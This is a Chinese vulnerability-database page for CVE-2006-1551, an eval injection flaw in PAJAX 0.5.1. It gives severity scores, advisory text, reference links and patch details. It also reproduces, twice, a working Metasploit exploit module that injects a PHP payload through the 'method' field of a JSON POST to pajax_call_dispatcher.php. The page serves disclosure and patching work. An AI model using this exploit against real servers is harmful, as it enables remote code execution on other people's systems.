CVE-2006-1551
CVSS7.5
发布时间 :2006-04-13 18:02:00
修订时间 :2011-03-07 21:33:18
NMCOEPS    

[原文]Eval injection vulnerability in pajax_call_dispatcher.php in PAJAX 0.5.1 and earlier allows remote attackers to execute arbitrary code via the (1) $method and (2) $args parameters.


[CNNVD]PAJAX pajax_call_dispatcher.php远程执行任意命令漏洞(CNNVD-200604-210)

        PAJAX是一个使用JavaScript创建远程PHP对象的框架系统。
        PAJAX的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        PAJAX的pajax_call_dispatcher.php脚本对用户提交的POST参数没有做充分的检查过滤,可能由此执行嵌入其中的PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:georges_auberger:pajax:0.5.1
cpe:/a:georges_auberger:pajax:0.5.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1551
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1551
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-210
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1353
(UNKNOWN)  VUPEN  ADV-2006-1353
http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php
(VENDOR_ADVISORY)  MISC  http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php
http://xforce.iss.net/xforce/xfdb/25859
(UNKNOWN)  XF  pajax-pajaxcalldispatcher-code-execution(25859)
http://www.securityfocus.com/bid/17519
(UNKNOWN)  BID  17519
http://www.securityfocus.com/archive/1/archive/1/431029/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060413 PAJAX Remote Code Injection and File Inclusion Vulnerability
http://www.osvdb.org/24618
(UNKNOWN)  OSVDB  24618
http://secunia.com/advisories/19653
(UNKNOWN)  SECUNIA  19653
http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0270.html
(UNKNOWN)  FULLDISC  20060413 PAJAX Remote file inclusion and File Inclusion Vulnerability

- 漏洞信息

PAJAX pajax_call_dispatcher.php远程执行任意命令漏洞
高危 输入验证
2006-04-13 00:00:00 2006-04-14 00:00:00
远程  
        PAJAX是一个使用JavaScript创建远程PHP对象的框架系统。
        PAJAX的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        PAJAX的pajax_call_dispatcher.php脚本对用户提交的POST参数没有做充分的检查过滤,可能由此执行嵌入其中的PHP代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://download.auberger.com/pajax-0.5.2.zip

- 漏洞信息 (16901)

PAJAX Remote Command Execution (EDBID:16901)
php webapps
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: pajax_remote_exec.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PAJAX Remote Command Execution',
			'Description'    => %q{
					RedTeam has identified two security flaws in PAJAX (<= 0.5.1).
				It is possible to execute arbitrary PHP code from unchecked user input.
				Additionally, it is possible to include arbitrary files on the server
				ending in ".class.php".
			},
			'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					['CVE', '2006-1551'],
					['OSVDB', '24618'],
					['BID', '17519'],
					['URL', 'http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      =>
						{
							'ConnectionType' => 'find',
						},
					'Space'       => 4000,
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Mar 30 2006',
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('URI', [true, "The full URI path to pajax_call_dispatcher.php", "/pajax/pajax/pajax_call_dispatcher.php"]),
				OptString.new('MOD', [true, "The PAJAX module name", "Calculator"])
			], self.class)
	end


	def exploit

		args = %Q!{ "id": "bb2238f1186dad8d6370d2bab5f290f71", "className": "#{datastore['MOD']}", "method": "add(1,1);#{payload.encoded};$obj->add", "params": ["1", "5"] }!

		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'method'   => 'POST',
			'data'     => args,
			'ctype'    => 'text/x-json'
		}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")
		else
			print_status("No response from the server")
		end
	end

end
		

- 漏洞信息 (F82363)

PAJAX Remote Command Execution (PacketStormID:F82363)
2009-10-30 00:00:00
Matteo Cantoni  
exploit,arbitrary,php
CVE-2006-1551
[点击下载]

RedTeam has identified two security flaws in PAJAX versions 0.5.1 and below. It is possible to execute arbitrary PHP code from unchecked user input. Additionally, it is possible to include arbitrary files on the server ending in ".class.php".

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'PAJAX Remote Command Execution',
			'Description'    => %q{
				RedTeam has identified two security flaws in PAJAX (<= 0.5.1).
				It is possible to execute arbitrary PHP code from unchecked user input.
				Additionally, it is possible to include arbitrary files on the server
				ending in ".class.php".			
			},
			'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2006-1551'],
					['OSVDB', '24618'],
					['BID', '17519'],
					['URL', 'http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      => 
						{
							'ConnectionType' => 'find',
						},
					'Space'       => 4000,
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Mar 30 2006',
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('URI', [true, "The full URI path to pajax_call_dispatcher.php", "/pajax/pajax/pajax_call_dispatcher.php"]),
					OptString.new('MOD', [true, "The PAJAX module name", "Calculator"])
				], self.class)
	end


	def exploit
	
		args = %Q!{ "id": "bb2238f1186dad8d6370d2bab5f290f71", "className": "#{datastore['MOD']}", "method": "add(1,1);#{payload.encoded};$obj->add", "params": ["1", "5"] }!
	
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'method'   => 'POST',
			'data'     => args,
			'ctype'    => 'text/x-json'
		}, 25)
		
		if (res)
			print_status("The server returned: #{res.code} #{res.message}")
		else
			print_status("No response from the server")
		end
	end
	
end

    

- 漏洞信息

24618
PAJAX pajax_call_dispatcher.php Arbitrary PHP Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

PAJAX contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when PHP code is included in the 'method' and 'args' variables. This flaw may lead to a loss of integrity.

- 时间线

2006-04-14 2006-03-30
2006-04-13 Unknow

- 解决方案

Upgrade to version 0.5.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

PAJAX Multiple Arbitrary PHP Code Execution Vulnerabilities
Input Validation Error 17519
Yes No
2006-04-14 12:00:00 2006-05-16 10:34:00
These issues were discovered by RedTeam.

- 受影响的程序版本

PAJAX PAJAX 0.5.1
PAJAX PAJAX 0.5.2

- 不受影响的程序版本

PAJAX PAJAX 0.5.2

- 漏洞讨论

PAJAX is reported prone to multiple remote code-execution vulnerabilities. These issues may allow an attacker to gain unauthorized access to a vulnerable computer by executing arbitrary PHP code.


PAJAX versions 0.5.1 is affected by this issue. Prior versions may be affected as well.

- 漏洞利用


An exploit is not required.

Proof of concept is available.

- 解决方案

The vendor has released version 0.5.2 to address these issues.


PAJAX PAJAX 0.5.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站